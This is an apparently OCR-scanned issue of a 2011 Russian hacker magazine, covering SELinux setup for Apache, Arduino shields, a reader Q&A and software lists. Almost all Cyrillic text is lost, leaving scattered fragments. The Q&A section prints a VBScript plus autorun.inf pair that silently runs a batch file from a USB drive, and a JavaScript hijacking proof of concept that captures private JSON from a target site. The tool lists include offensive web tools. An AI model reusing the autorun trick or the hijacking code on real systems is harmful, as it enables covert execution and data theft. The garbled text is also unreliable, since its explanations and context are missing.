. ,
httpd_selinux(8) ,
Apache, ,
.
, , SELinux
. ,

- , SELinux
. ,
, -.
SELinux /var/log/audit/audit.
log. ,
,
. ,
,
. /var/log/messages,
:
# grep "SELinux is preventing" /var/log/messages
May 7 18:55:56 localhost setroubleshoot: SELinux is
preventing httpd (httpd_t) "getattr" to /var/www/
html/index.html (home_dir_t). For complete SELinux
messages. run sealert -l de7e30d6-5488-466d-a60692c9f40d316d

: SELinux
httpd_t (- Apache) /var/www/html/
index.html , (home_dir_t ,
). SELinux
sealert -l --. ,
, ,
, .
:
index.html mv,
, . .
chcon:

semanage boolean -l: c SELinux

, chcon
, restorecon,
/www default_t (
, , ).
:
# semanage fcontext -a -t httpd_sys_content_t /www
# restorecon -v /www

,
/www httpd_
sys_content_t, ,
( SELinux ,
,
semanage ).
semanage
-:

INFO

info
SELinux

UNIX,

,

.

# semanage boolean -l

-
, , , -
(httpd_can_network_connect_db) ftp
(ftp_home_dir) .. ,
.
/ ,
setsebool:
# setsebool httpd_can_network_connect_db on
# setsebool httpd_can_network_connect_db off

-P,
. semanage

SELinux :

WARNING
warning
tar

,

. --selinux
.

# semanage permissive -a httpd_t


# chcon -t httpd_sys_content_t \
/var/www/html/index.html


:
# restorecon -v /var/www/html

Apache ok.
,
Apache (, /www).
X 08 /151/ 2011

:
# semanage permissive -d httpd_t

SELinux , .
,
,
. z

133

PHREAKING
id (mk90.ru)

Shield- Arduino
Arduino ,
Open Hardware ,
.
:

.
?


$30. ATMEL USB-,
.
.
Arduino ( ) Wiring. , C++, digitalWrite (
) analogRead ( ).
- ,
C++.
Arduino USB ArduinoIDE
(arduino.cc/en/Main/Software).
- ,
ATMEL .
,
-. , , ,
.

, , ,
. , ,
.
, .
, .
- .

Shield-?

Shield- ,
.
,

134

Ethernet, . Arduino,
.
, ,
Arduino.
,
(shieldlist.org).

-. : ,
. -
- .
?
, .
, Arduino

. Arduino Mega Arduino
ATmega1280 ATmega2560, ,
, Uno Duemilanova. -
, Mega SPI
! Arduino SPI,

Mega , ,
- 23.
Shield- .

,
Motorshield,
X 08 /151/ 2011


Arduino Uno
aka ladyada (ladyada.net/make/mshield/).
, ,
-. : , . H- L293D, 600
4,5 36 .
, 1,2 .
, ,
, .
Ardumoto L298 Sparkfun
( 2 )
Monster Moto Shield (sparkfun.com/products/10182)
VNH2SP30, 30 41 . , : -
,
, .



Mega

Ethernet

Ethernet
ENC28J60 Microchip
W5100 Wiznet.
SPI, Arduino.
ENC28J60 W5100: 10 /, IP, UDP,
TCP. , W5100
( ).
, W5100,
(SRAM), ( Atmega328 ). : W5100
TCP ,
Atmeg .
Arduino Ethernet
Shield (arduino.cc/en/Main/ArduinoEthernetShield)
Arduino. , :
IP- DHCP;
NTP;
DNS;
RADIUS;
X 08 /151/ 2011

Motorshield Ladyada
Web-
Web-,
.
Freetronics
EthernetShield with PoE (freetronics.com/products/ethernet-shieldwith-poe). Ethernet-
Ethernet, , 2001 ,
IEEE
802.3af. ,
, Ethernet
100
. ,
PoE
SD- .

135

PHREAKING

Freeduino EtherSD shield Ethernet 10/100 microSD


, TCP/
IP. ,
- .
-,
Arduino+Ethernet .
EthernetShield , , ,
, -
. ,
30 Arduino Duemilanova
Mega 2560,
.

SD-

, -
(, GPS-),
. ,
SD-. .
microSD module, Libellium,
(goo.gl/
iHCy4).
Arduino
SD SDHC-, FAT16 () FAT32.
, .

RF- (ASK),
433 313
Arduino VirtualWire,
.
,
,

136


. , -
.

Xbee, Zigbee,

.
,
Arduino.
Xbee Shield, , Libellium
Communication Shield (goo.gl/OZDxl). ,
Xbee. , ,
Xbee. 250
/, 90
( Xbee PRO 1,2 ), ,
( ).
, , - WiFi,
Bluetooth.
WiFly Shield SparkFun (sparkfun.com/products/9954) Bluetooth
module Libellium (cooking-hacks.com/index.php/arduinobluetooth-module-89.html). Xbee
Xbee, Arduino
AT-. ,
Arduino BT (arduino.cc/en/
Main/ArduinoBoardBluetooth), USB-,

Bluetooth.
, .
GSM ,
TTL.
USB,
( , Arduino). , ,
GSM-, X 08 /151/ 2011

WiFly- Sparkfun

microSD- Libellium

,
-
(,
GPS-),

.
GPRS Quadband module for Arduino Libellium
(goo.gl/KueFH), GPRS- SAGEM.
GRPS- ,
.

,
.
, .
: Radiation Sensor Board Libellium ( ).
, , .
Seeeduino Stalker
Arduino- , ,
.
USB Host Shield Arduino ,
.
, TFT-
. LoL-Shield.
, .
Atmega (0, 1 ). 126 ,
914,
Arduino,
, , - Space Invaders.
,
X 08 /151/ 2011

LoL Shield
, , .
, .

LCD-.
- 1602 HD44780 .
Arduino:
!
( ,
ArduinoIDE,
LiquidCrystal).
,
. , Arduino. , 2,54 , (
,
PLS).
,
.
, . !
,

137

PHREAKING

- HD44780

...
. 10-20 ,

analog0, .
PLS
, .
, ,
Arduino ,
.
.
Arduino
- LiquidCrystal.
? ? ,
, -
!

138

!
.
.
, UTF-8 . github.com/mk90. z
X 08 /151/ 2011

1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! ,
.
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )

12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).

UNITS
Step (twitter.com/stepah)

faq
united?

faq@real.xakep.ru

Q:
SIP-GSM-?
Oktell SIP-GSM Gateway (www.
A: telsystems.ru/gateways), ,

3G- .
,

ZTE Huawei. ,
, Huawei e1550,
GSM.
, 3G-
,

.

, .
,

. ,
, ,
.
,
SIP-GSM-?

SIP-,

SIP- (asterisk, oktell, sipnet ..).
GSM-SIP-.

140


3G-.
:
Huawei E1550, Huawei E160g, ZTE MF180.
, , : VoIP-GSM
. :
$300 (, ,
700-800 , ). ,
.
bit.ly/aNNQTD.

,
.
, ,
. , ,
iPhone/
iPad, Objective-C - .

Q: - bat- ?
A: , ,
Microsoft ,
.
:
1. myfile.vbs :

Q: Adobe Flash SWF- iOS-.


, Apple
, iPhone/
iPad . ,


?
A: -

2. autorun.inf :

, iOS,
:
, ,

,
,
USB-.

Set WshShell = CreateObject(


"WScript.Shell")
WshShell.Run "cmd.exe /c
[_BAT_]", 0, false

[AutoRun]
UseAutoPlay=1
open=myfile.vbs

X 08 /151/ 2011

GSM-VoIP
3G-
Q: ,
.
,
SSL-. .
SSL- ?
- ?
A: SSL-,
,
. , ( 30 90
). - www.freessl.su.
,
SSL-. ,
,

:
Your Name:
Example: John Smith
Your E-mail:
Example: test@example.com
Phone:
Example: 8(495)2295670
Select the server software used to
generate the CSR:
Example: Apache-SSL
CSR:
Example:
-----BEGIN CERTIFICATE REQUEST----MIIDUDCCArkCAQAwdTEWMBQGA1UEAxMNdGVzd
C50ZXN0LmNvbTESMBAGA1UECxMJ
TWFya2V0aW5nMREwDwYDVQQKEwhUZXN0IE9yZ
zESMBAGA1UEBxMJVGVzdCBDaXR5
.......
Rq+blLr5X5iQdzyF1pLqP1Mck5Ve1eCz0R9/
OekGSRno7ow4TVyxAF6J6ozDaw7e
GisfZw40VLT0/6IGvK2jX0i+t58RFQ8WYTOcT
RlPnkG8B/uV
-----END CERTIFICATE REQUEST-----


CSR (Certificate Signing Request).

,
(Public Key).
X 08 /151/ 2011

GD GUI
Android
openssl ( www.
freessl.su/articles/13).
mod_ssl
Apache (, ).

www.freessl.su/articles/14.

Q: ,
JavaScript hijacking?
A:
- (oxdef.info).
(
- bit.ly/jOMIpv) - .
, -
JSONP.
,
JavaScript
.
, - JSON- -
:
[{"foo":"private data"}]

JS-,
. ,
foo ,
:
Object.prototype.__defineSetter__
("foo", function(x) {
var s = "";
for (f in this) {
s += f + ": " + this[f] + ", ";
}
s += "foo: " + x;
// s
//
//
});
</script>
<script src="http://target.com/
private/data.js"></script>

JSONP, ,
:

,

. :
evilFunction({"paper": "A4", "count":
5})

, ,
.

Q:
, , .
?
A: - ExtJS (www.sencha.com),
-,
. , , ,
,
,
. ExtJS ,
JavaScript
. , , , .

Q: ,

?
A: Google

,
6- . jQuery,
JS-, ,
(jquery.thewikies.com/
browser). .

Q: MySQL?
A:
, , noSQL
,

.
HandlerSocket Plugin,

141

UNITS

,

SQL.

, , ,
750
!

GPU:
OpenCL: NT, raw-MD4, raw-MD5, NSLDAP
raw-SHA1;
CUDA: raw-SHA256, phpass.
John the Ripper,
,
,
ZIP RAR, PDF, SSH-. ighashgpu
(hww.golubev.com/blog).

Q: MBR,
. MBR?
Q:
A: , Android-?
MBR,
Android market Perl- Boot Record
Parsers (www.garykessler.net/software/index.
,
html), :
.
mbrparser DOS/Windows Master
A: . Boot Record (MBR);
bsparser
FAT NTFS.
,
An Examination of
the Standard MBR (bit.ly/kI8AWa).

Q:

. email-.
A:
bulk_extractor
(afflib.org/software/bulk_extractor). C++ , , ,

. , bulk_extractor
,
,

.

HDD, SSD,
, ,
.. , ,
( ,
digital forensics), EXIF , IP/MAC/Email-, URL
..
,

Python.

Q:
MD5 ?
A: , ,
John the Ripper (www.openwall.com/
john) ,
.
-

142

Android ,
- Dalvik Executable
(.dex).
.
dex2jar (code.google.com/p/
dex2jar), .dex-
Java-, JD-GUI (java.decompiler.free.
fr).
smali (code.google.com/p/smali).
Kivlad (www.matasano.com),
Dalvik- Java-,
.
Ruby
Windows, Linux OS X.

Q: , ,
USB?
A: USB-
, , VMware.
(vmx-)
:
usb.analyzer.enable = TRUE
monitor = "debug"
usb.analyzer.maxLine = 8192
mouse.vusb.enable = FALSE


vmware.log.
,
vsusbanalyser (vusb-analyzer.sourceforge.net/
tutorial.html). PCAP-, Ruby vmwusb2pcap.
rb (bit.ly/la7Aju).

Q: call- ,
. 0 ,
1 , ..
- ,
?
A: IVR (. Interactive Voice
Response), ,
call-.
.
IVR
Asterix
(www.asterisk.org).
IVR-
extensions.conf, AGI.
Perl Python,
.
Asterix ,
.

.
IVR
: bit.ly/lNj26k. ,
, , ,
.

Q:
Google,

,

.
,

?
A: , : Duo Security
(www.duosecurity.com) Symantecs VIP
Authentication Service (www.verisign.com).

,
Mobile-OTP (motp.sourceforge.
net). ,
, Java
,
RADIUS- (,
XTRadius), . , Android iPhone
Java- .
,
..z
X 08 /151/ 2011

>Net
Bimoid messenger 1.0.0.48
Bimoid server 1.0.0.36

>>MAC
Adobe Flash Player 10.3.181.34
Audirvana 0.9.4
CandyBar 3.3
Coda 1.7.1
DesktopLyrics 1.3.4
Fluid 1.2
Google Chrome 12.0.742.112
Grep 1.1.9
MenuMeters 1.5
Miro 4.0.2
Opera 11.50
Sequel Pro 0.9.9
Syrinx 2.4.4
Thunderbird 5.0
Transmission 2.32
Tunnelblick 3.2
uTorrent 1.5.4
VirtualBox 4.0.10
WaveMaker 6.3.2

>System
AnyBackup 0.9.1
AxCrypt 1.7.2126
Boomerang 1.0
Defraggler 2.06
Duplicate Commander 2.2
FreeOTFE 5.21
Gpg4win 2.1.0
OSForensics 0.98beta
Pretty Flow 2.0.0.99
VirtualBox 4.0.10

>Security
PAC 3.0.1
del2info 0.1.2

>Net
Empathy 3.0.2
Fetchmail 6.3.20
Firefox 5
Freesa 2.0.0
FtpCube 0.5.1
IPTraf 3.0.0
Mldonkey 3.0.7
Mutt 1.5.21
Net-SNMP 5.7
Opera 11.50
Pidgin 2.9
Quassel 0.7.1
SeaMonkey 2.1
Stunnel 4.38
Thunderbird 5.0
TightVNC 2.0.3
Transmission 2.32
WeeChat 0.3.5

>Devel
amysql 1.1
Anjuta IDE 3.0.3.0
ChiliProject 2.0.0
CImg 1.4.9
Clutter 1.6.16
Eclipse 3.7 Indigo
EKOPath 4
Eric5 5.1.4
libpng 1.5.4
Linguist
Mercurial 1.9
nVidia CUDA 4.0
Prolog 1.4.0
Python-LDAP 2.4.1
SiteFusion 5.4
SmartGit 2.0.5
SymPy 0.7.0
Tornado 2.0
wxWidgets 2.8.12

>System
Amanda 3.3.0
AMD Catalyst 11.6
CheckInstall 1.6.2
ClamAV 0.97.1
Iat 0.1.7
Krusader 2.0.0
Linux Kernel 2.6.39.3
Midnight Commander 4.7.5.2
muCommander 0.8.5
Nvidia 275.09.07
Systemd 29
Vim 7.3
VirtualBox 4.0.10
Wine 1.2.3
Zsh 4.3.12

>Server
Apache 2.2.19
Apache Solr 3.3
Apache Traffic Server 3.0
BIND 9.8.0
CUPS 1.4.7
DHCP 4.2.1
Lighttpd 1.4.29
MiniDLNA 1.0.20
MySQL 5.5.14
OpenLDAP 2.4.26
OpenSSH 5.8
OpenVPN 2.2.1
Postfix 2.8.4
PostgreSQL 9.0.4
Samba 3.5.9
Sendmail 8.14.5
Squid 3.1.14

Mantra Security Toolkit 0.61


Prey 0.5.3
Vega
sslsniff 0.7
ksymhunter
ZAProxy 1.3.1
Skipfish 1.94b
Burp Suite 1.4
FaceNiff 1.9.4
BeEF 0.4.2.7
Durandal 0.5
XSS-Harvest
bsqlbf-v2 2.7
complemento 0.7.7
DOM Snitch v0.707
Ghost-phisher 1.2
honggfuzz 0.3
JMD 1.61
Kivlad 0.1
Nerve
NIELD 0.11
sniffjoke 0.4.1
XSSF 2.1
$

>Multimedia
BurnAware Free
Clementine 0.7.1
DualMonitorTools 1.8
EncodeHD 1.2.238
Evernote 4.4.2
FreeVDF 1.0.1.7
Hamster Free eBook Converter
IrfanView 4.30
ONVIF Device Manager 9.9.4017
puush for Windows
Stellarium 0.11.0
Winamp Media Player 5.62

>Misc
BatteryInfoView 1.00
BleachBit 0.8.8
Console 2.00b
Dexpot 1.5.11
Eraser 6.0.8
KeePass 1.20
ManicTime 1.5.5
notifu 1.6
PasswordMaker Desktop Edition 0.1
PeaZip 3.8
PureText 2.0
Window On Top
Youtube SRT Downloader

>Security
BinVis
bsqlbf-v2 2.7
DOM Snitch v0.707
JMD 1.61
Kivlad 0.1
mona.py 1.0
MysqlPasswordAuditor 1.0
Nerve
NetworkMiner 1.0
OpenPuff v3.30
ophcrack 3.3.1
The Sleuth Kit 3.2.2
WebSurgery
XSSF 2.1

>>UNIX
>Desktop
Darktable 0.9
DockbarX 0.45
Feh 1.14.2
Flphoto 1.3.1
Hugin 2011.0.0
Icewm 1.3.7
KoverArtist 0.7.5
LilyPond 2.15.4
LiVES 1.4.4
OutWiker 1.3.0
Sawfish 1.8.1
Scribus 1.4.0rc5
Solfege 3.20
Stellarium 0.11.0
Synfig Studio 0.63.00
Traverso 0.49.2
VisIt 2.3
Wmii 3.9.2
)

HEX-:
010 Editorfor Windows 3.2
FlexHEX Editor 2.6
Hex Editor Neo Standard 4.97
Hex EditorNeo Free 4.97
Hiew32 Demo
McAfee FileInsight 2.1
radare2-0.7

Python:
ActivePython Community Edition
2.7.2
DreamPie 1.1.1
Eric5 5.1.4
IronPython 2.7
Jython 2.5.2
Komodo Edit 6.1.1
Komodo IDE 6.1.1
PyPy 1.5
PyScripter 2.4.1
Python 2.7.2
Python 3.2.1
Spyder 2.0.12
Stackless Python for Python 2.7.1
Stackless Python for Python 3.2
Wing IDE 101 4.0.3
Wing IDE 4.0.3

BoxCryptor 1.0
CloseTheDoorSetup 0.2.1
DropboxPortableAHK
dropf 0.2.4
EMCO Remote Console 1.0.1
Instantbird 1.0
Logstalgia 1.0.3
Maryfi
MetroTwit beta
Opera 11.50
PuTTYTabManager 0.11
Thunderbird 5.0
Vistumber v10b5
Win7 MAC Address Changer v1.0
beta
WinDump 3.9.5
(

08(151) 2011

>>WINDOWS
>Development
ClickHeat 1.14
FastSharp
x

. 28



: 2
10
.

. 56


SAME ORIGIN POLICY

DNS
REBINDING

$500 000

APPSTORE

t%SPQCPY
t!.BJM3V
t)%.PPSF.FUBTQMPJU
t(FOFSBUJPO$BSCFSQ
t,PIBOB .7$-07&

PHDAYS
2011

08 (151) 2011

. 66

UNITS

HTTP://WWW2


Flash HTML5

MIDOMI
www.midomi.com

GOOGLE
SWIFFY
swiffy.googlelabs.com

,
Shazam SoundHound. :
. , (, ), . -
midomi.
. ,
.
, . ! music
fingerprinting!

HTML5 , Flash
. Flash , .
, iPhone iPad
Flash-. ,
Adobe, . ,
Flash SWF HTML5.
- Google Swiffy. SWF 8 ActionScript 2.0,
WebKit (Chrome, Moible Safari ..).

ADOBE
BROWSERLAB
browserlab.adobe.com

WUNDERLIST
www.wunderlist.com

(
, ),
. Browserlab. ,
Adobe .
,

.
URL .
, ,
, ..
, .

. Wunderlist,
. -, Windows Mac OS X,
Android iPhone/iPad. TODO : - , -. , Wunderlist
,
. , ( github.com/6wunderkinder). , Titanium.

144

X 08 /151/ 2011




:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

X 10 /141/ 10